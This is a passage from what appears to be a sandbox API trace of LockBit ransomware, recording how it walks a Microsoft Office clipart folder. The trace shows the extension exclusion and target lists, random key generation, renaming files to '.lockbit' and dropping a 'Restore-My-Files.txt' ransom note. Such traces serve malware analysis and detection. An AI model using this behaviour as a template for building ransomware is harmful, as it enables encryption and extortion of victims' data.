lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.470] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.471] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.471] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198372.WMF") returned 1 [0150.472] lstrcmpiW (lpString1="ntldr", lpString2="J0198372.WMF") returned 1 [0150.472] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198372.WMF") returned 1 [0150.472] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198372.WMF") returned -1 [0150.472] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198372.WMF") returned -1 [0150.472] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198372.WMF") returned 1 [0150.472] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198372.WMF") returned -1 [0150.472] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.472] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF") returned=".WMF" [0150.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.472] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.473] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.474] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.474] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF.lockbit") returned 72 [0150.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198372.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.475] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.475] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.475] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28572) returned 1 [0150.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.476] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.495] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.495] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.496] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.500] free (_Block=0x1fa2ed8) [0150.500] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.500] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.500] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1925100, ftCreationTime.dwHighDateTime=0x1be3a08, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf1925100, ftLastWriteTime.dwHighDateTime=0x1be3a08, nFileSizeHigh=0x0, nFileSizeLow=0x9d6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198377.WMF", cAlternateFileName="")) returned 1 [0150.500] lstrcmpiW (lpString1=".", lpString2="J0198377.WMF") returned -1 [0150.500] lstrcmpiW (lpString1="..", lpString2="J0198377.WMF") returned -1 [0150.500] PathFindExtensionW (pszPath="J0198377.WMF") returned=".WMF" [0150.500] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.500] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.500] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.500] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.501] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.501] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.502] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198377.WMF") returned 1 [0150.502] lstrcmpiW (lpString1="ntldr", lpString2="J0198377.WMF") returned 1 [0150.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198377.WMF") returned 1 [0150.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198377.WMF") returned -1 [0150.502] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198377.WMF") returned -1 [0150.502] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198377.WMF") returned 1 [0150.502] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198377.WMF") returned -1 [0150.502] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.503] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF") returned=".WMF" [0150.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.503] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.503] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.504] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.504] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.504] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.504] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.504] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF.lockbit") returned 72 [0150.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198377.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.506] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.506] malloc (_Size=0x40068) returned 0x3df0008 [0150.506] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=40300) returned 1 [0150.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.508] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.512] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.512] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.512] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.515] free (_Block=0x1fa2ed8) [0150.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.515] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.515] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198447.WMF", cAlternateFileName="")) returned 1 [0150.515] lstrcmpiW (lpString1=".", lpString2="J0198447.WMF") returned -1 [0150.515] lstrcmpiW (lpString1="..", lpString2="J0198447.WMF") returned -1 [0150.515] PathFindExtensionW (pszPath="J0198447.WMF") returned=".WMF" [0150.515] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.515] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.516] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.516] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198447.WMF") returned 1 [0150.517] lstrcmpiW (lpString1="ntldr", lpString2="J0198447.WMF") returned 1 [0150.517] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198447.WMF") returned 1 [0150.517] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198447.WMF") returned -1 [0150.517] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198447.WMF") returned -1 [0150.517] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198447.WMF") returned 1 [0150.517] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198447.WMF") returned -1 [0150.517] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.517] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF") returned=".WMF" [0150.517] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.517] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.517] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.518] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.518] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF.lockbit") returned 72 [0150.518] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198447.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.520] 